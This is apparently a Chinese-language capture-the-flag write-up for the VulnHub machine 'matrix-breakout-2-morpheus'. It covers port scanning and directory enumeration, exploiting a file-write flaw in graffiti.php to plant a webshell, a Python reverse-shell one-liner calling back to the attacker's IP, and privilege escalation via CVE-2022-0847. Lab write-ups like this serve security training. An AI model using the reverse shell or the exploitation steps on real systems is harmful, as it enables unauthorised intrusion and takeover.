vulnhub_matrix-breakout-2-morpheus
前言靶机地址:matrix-breakout-2-morpheus
攻击机:kali2022.3
靶机:matrix-breakout-2-morpheus
题目描述:
这是《黑客帝国突围》系列的第二部,副标题为墨菲斯:1。它的主题是对第一部黑客帝国电影的回归。你扮演三位一体,试图调查尼布甲尼撒的一台计算机,Cypher将其他人都锁在外面,这掌握着一个谜团的钥匙。
难度:中等难度
信息收集
探测靶机
nmap -sP 192.168.70.0/24
点击查看代码┌──(root㉿kali)-
└─# nmap -sP 192.168.70.0/24
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-31 06:43 EST
Nmap scan report for 192.168.70.1
Host is up (0.00024s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.70.2
Host is up (0.00013s latency).
MAC Address: 00:50:56:FE:42:C8 (VMware)
Nmap scan report for 192.168.70.151
Host is up (0.00015s latency).
MAC Address: 00:0C:29:99:AE:0E (VMware)
Nmap scan report for 192.168.70.254
Host is up (0.00026s latency).
MAC Address: 00:50:56:E9:E4:7C (VMware)
Nmap scan report for 192.168.70.137
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 6.09 seconds其中根据靶机在vmware中的mac地址来判断靶机iphttps://img2023.cnblogs.com/blog/2830174/202301/2830174-20230131202227372-506916171.png
可以看到192.168.70.151
扫描端口信息
nmap -A -p- 192.168.70.151
点击查看代码┌──(root㉿kali)-
└─# nmap -A -p- 192.168.70.151
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-31 06:44 EST
Nmap scan report for 192.168.70.151
Host is up (0.00042s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp openssh OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
|_256 aa83c351786170e5b7469f07c4ba31e4 (ECDSA)
80/tcp openhttp Apache httpd 2.4.51 ((Debian))
|_http-title: Morpheus:1
|_http-server-header: Apache/2.4.51 (Debian)
81/tcp openhttp nginx 1.18.0
|_http-title: 401 Authorization Required
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_Basic realm=Meeting Place
|_http-server-header: nginx/1.18.0
MAC Address: 00:0C:29:99:AE:0E (VMware)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).可以发现有一个80端口和一个81端口
查看网站
可以发现80端口是一个网页
https://img2023.cnblogs.com/blog/2830174/202301/2830174-20230131203829507-944549537.png
81端口是一个登录框
https://img2023.cnblogs.com/blog/2830174/202301/2830174-20230131203855686-1220628636.png
使用插件查看网站信息
https://img2023.cnblogs.com/blog/2830174/202301/2830174-20230131203929472-1217854473.png
查看一下robots.txt
https://img2023.cnblogs.com/blog/2830174/202301/2830174-20230131212027942-2131690322.png
没什么东西
网站目录
点击查看代码┌──(root㉿kali)-
└─# dirsearch -u http://192.168.70.151/
_|. _ ____ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927
Output File: /root/.dirsearch/reports/192.168.70.151/-_23-01-31_08-33-34.txt
Error Log: /root/.dirsearch/logs/errors-23-01-31_08-33-34.log
Target: http://192.168.70.151/
Starting:
403 -279B- /.htaccess.bak1
403 -279B- /.ht_wsr.txt
403 -279B- /.htaccess.sample
403 -279B- /.htaccess.save
403 -279B- /.htaccess_extra
403 -279B- /.htaccess_orig
403 -279B- /.htaccessBAK
403 -279B- /.htaccess_sc
403 -279B- /.htaccessOLD
403 -279B- /.htaccessOLD2
403 -279B- /.html
403 -279B- /.htm
403 -279B- /.htpasswds
403 -279B- /.httr-oauth
403 -279B- /.htaccess.orig
403 -279B- /.htpasswd_test
403 -279B- /.php
200 -348B- /index.html
301 -321B- /javascript->http://192.168.70.151/javascript/
200 - 47B- /robots.txt
403 -279B- /server-status
403 -279B- /server-status/
Task Completed 没发现什么有价值得,换个工具继续扫dirbusterhttps://img2023.cnblogs.com/blog/2830174/202301/2830174-20230131222948371-1506440697.png
设置好字典和url就可以start了
https://img2023.cnblogs.com/blog/2830174/202301/2830174-20230131231221287-772938290.png
漏洞发现
https://img2023.cnblogs.com/blog/2830174/202301/2830174-20230131231223027-47343206.png
发现了一个php文件访问看看ip/graffiti.php
https://img2023.cnblogs.com/blog/2830174/202301/2830174-20230131231405640-264492798.png
这里随便写入一个'试试有没有sql注入,并且抓包,发现数据包中存在一个graffiti.txt,访问发现刚才写入得'被写入到文件中所以判断存在任意文件写入漏洞
漏洞利用-任意文件写入
拿下webshell
写入一句话木马
https://img2023.cnblogs.com/blog/2830174/202301/2830174-20230131235414436-1792128219.png
用蚁剑连接木马
https://img2023.cnblogs.com/blog/2830174/202302/2830174-20230201000607899-1252371102.png
查看根目录,在根目录发现了flag1
https://img2023.cnblogs.com/blog/2830174/202302/2830174-20230201163445645-1801233844.png
https://img2023.cnblogs.com/blog/2830174/202302/2830174-20230201163457167-1595457543.png
https://img2023.cnblogs.com/blog/2830174/202302/2830174-20230201163622038-881202210.png
https://img2023.cnblogs.com/blog/2830174/202302/2830174-20230201171258942-1504301684.png
内核信息
cat /etc/*-release
https://img2023.cnblogs.com/blog/2830174/202302/2830174-20230201001742797-2088836339.png
反弹shell
点击查看代码python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.70.137\",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'https://img2023.cnblogs.com/blog/2830174/202302/2830174-20230201163041183-434626596.png
https://img2023.cnblogs.com/blog/2830174/202302/2830174-20230201163056357-1359658885.png
反弹成功
提权
上传linpeas.sh -->>点击此处下载
使用蚁剑上传脚本
https://img2023.cnblogs.com/blog/2830174/202302/2830174-20230201171444365-731115679.png
加权限并且运行
https://img2023.cnblogs.com/blog/2830174/202302/2830174-20230201172052173-621930353.png
https://img2023.cnblogs.com/blog/2830174/202302/2830174-20230201174523341-1081674200.png
监测到得漏洞信息还是挺多得,这里使用CVE-2022-0847进行提权
点击此处下载-->>>Exploit
使用蚁剑上传exp,开打
https://img2023.cnblogs.com/blog/2830174/202302/2830174-20230201175635266-875622434.png
FLAG
FLAG1
在根目录下
https://img2023.cnblogs.com/blog/2830174/202302/2830174-20230201175813692-622059468.png
FLAG2
在root目录下
https://img2023.cnblogs.com/blog/2830174/202302/2830174-20230201175850758-91042889.png
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!
页:
[1]